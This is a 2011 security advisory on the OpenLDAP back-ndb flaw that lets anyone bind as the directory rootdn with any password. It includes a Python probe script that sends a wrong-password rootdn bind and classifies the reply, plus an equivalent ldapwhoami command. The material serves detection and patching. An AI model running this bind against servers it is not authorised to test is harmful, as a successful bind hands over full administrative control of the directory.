T-575: OpenLDAP back-ndb Lets Remote Users Authenticate Without a Valid Password

March 11, 2011 - 3:05pm

PROBLEM:

A vulnerability was reported in OpenLDAP. A remote user can authenticate without a valid password.

PLATFORM:

OpenLDAP version(s) 2.4.12 through 2.4.23 (fixed in 2.4.24)

ABSTRACT:

OpenLDAP back-ndb Lets Remote Users Authenticate Without a Valid Password.

REFERENCE LINKS:

SecurityTracker Alert ID: 1025190
Secunia Advisory: SA43331
OpenLDAP Issue
OpenLDAP Download
CVE-2011-1025


IMPACT ASSESSMENT:

Medium

Discussion:

A remote user who knows the configured rootdn (the directory administrator DN in slapd.conf) can bind as that DN with any password on servers that use the NDB (MySQL Cluster) back-end, and thereby obtains full rootdn privileges over the directory.

Impact:

Several vulnerabilities have been reported in OpenLDAP. They can be exploited by malicious people to bypass authentication and to cause a DoS (Denial of Service).

1) An error in the "back-ldap" component when a slave server forwards password failures to a master server can be exploited to successfully authenticate with an invalid password (CVE-2011-1024).
Successful exploitation of this vulnerability requires a master/slave configuration with the "ppolicy_forward_updates" option enabled.

2) An error in the "back-ndb" component when handling authentication for the "rootdn" Distinguished Name (DN) can be exploited to perform arbitrary actions (e.g. searching or updating the directory) without a valid password (CVE-2011-1025).
Successful exploitation of this vulnerability requires knowing the "rootdn" value as configured in the slapd.conf file; no password knowledge is required.

3) An error exists within the handling of certain MODRDN requests, which can be exploited to crash slapd by submitting specially crafted MODRDN requests (CVE-2011-1081).
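The rootdn bypass in item 2 is easy to verify from the outside, because the test is simply "does a bind as the rootdn with a password that cannot be right succeed?". The script below is an added example, not OpenLDAP code: it hand-encodes an LDAPv3 simple BindRequest (RFC 4511, BER on a plain socket) for the rootdn with a deliberately wrong password and classifies the BindResponse. A patched server must answer resultCode 49 (invalidCredentials); resultCode 0 (success) means the server accepted an arbitrary password. The host, port, rootdn and probe name are assumptions, the sample replies it parses offline are constructed, and it speaks cleartext LDAP on the port you give it, so run it only against servers you are authorized to test.

```python
"""Probe an LDAP server for the back-ndb rootdn bind bypass (CVE-2011-1025).

Added example, not OpenLDAP code. Encodes an LDAPv3 simple BindRequest for
the configured rootdn with a deliberately wrong password and classifies the
BindResponse: resultCode 0 means the server accepted an arbitrary password,
resultCode 49 (invalidCredentials) is the answer a patched server gives.
Host, port and rootdn are supplied on the command line (assumed values).
"""
import socket

LDAP_SUCCESS = 0
LDAP_INVALID_CREDENTIALS = 49
WRONG_PASSWORD = "this-is-not-the-real-password"   # constructed; must not match


def ber_len(n):
    """BER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber_tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content


def ber_int(value, tag=0x02):
    """INTEGER (or ENUMERATED with tag 0x0A) for small non-negative values."""
    body = value.to_bytes(value.bit_length() // 8 + 1, "big")
    return ber_tlv(tag, body)


def bind_request(msg_id, dn, password):
    """LDAPMessage { messageID, BindRequest [APPLICATION 0] { version 3, name, simple [0] } }."""
    body = ber_int(3) + ber_tlv(0x04, dn.encode()) + ber_tlv(0x80, password.encode())
    return ber_tlv(0x30, ber_int(msg_id) + ber_tlv(0x60, body))


def bind_response(msg_id, result_code, diag=""):
    """Server-side encoder, used here only to construct sample replies offline."""
    body = ber_int(result_code, 0x0A) + ber_tlv(0x04, b"") + ber_tlv(0x04, diag.encode())
    return ber_tlv(0x30, ber_int(msg_id) + ber_tlv(0x61, body))


def _read_tlv(buf, pos):
    """Return (tag, content, next_pos) for the TLV starting at pos."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_bind_response(msg):
    """Return (messageID, resultCode, diagnosticMessage) from a BindResponse."""
    tag, seq, _ = _read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, mid, pos = _read_tlv(seq, 0)
    tag, resp, _ = _read_tlv(seq, pos)
    if tag != 0x61:
        raise ValueError("not a BindResponse (expected [APPLICATION 1])")
    _, code, pos = _read_tlv(resp, 0)        # resultCode ENUMERATED
    _, _matched, pos = _read_tlv(resp, pos)  # matchedDN, unused here
    _, diag, _ = _read_tlv(resp, pos)        # diagnosticMessage
    return int.from_bytes(mid, "big"), int.from_bytes(code, "big"), diag.decode(errors="replace")


def classify(result_code):
    if result_code == LDAP_SUCCESS:
        return "VULNERABLE: bind as rootdn accepted with a wrong password"
    if result_code == LDAP_INVALID_CREDENTIALS:
        return "OK: wrong password rejected"
    return "INCONCLUSIVE: unexpected resultCode %d" % result_code


def probe(host, port, rootdn, timeout=5.0):
    """Send the bad-password bind over a plain socket and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(bind_request(1, rootdn, WRONG_PASSWORD))
        reply = sock.recv(4096)
    _, code, diag = parse_bind_response(reply)
    return classify(code), diag


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 4:   # usage: probe.py HOST PORT ROOTDN (authorized targets only)
        print(*probe(sys.argv[1], int(sys.argv[2]), sys.argv[3]))
    else:
        # Offline demonstration with constructed replies from both kinds of server.
        for code in (LDAP_INVALID_CREDENTIALS, LDAP_SUCCESS):
            _, got, _ = parse_bind_response(bind_response(1, code))
            print(got, classify(got))
```

The same check with the stock OpenLDAP client is `ldapwhoami -x -H ldap://host -D "<rootdn>" -w <wrong-password>`, which on a patched server prints `ldap_bind: Invalid credentials (49)`; any successful "dn:" answer to a wrong password is the bypass. The rootdn is not a normal directory entry, so password-policy lockout does not protect it, and a positive result grants full administrative access to the whole directory.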

Solution:

Patches/Software Downloads: Update to version 2.4.24.

OpenLDAP-2.4.24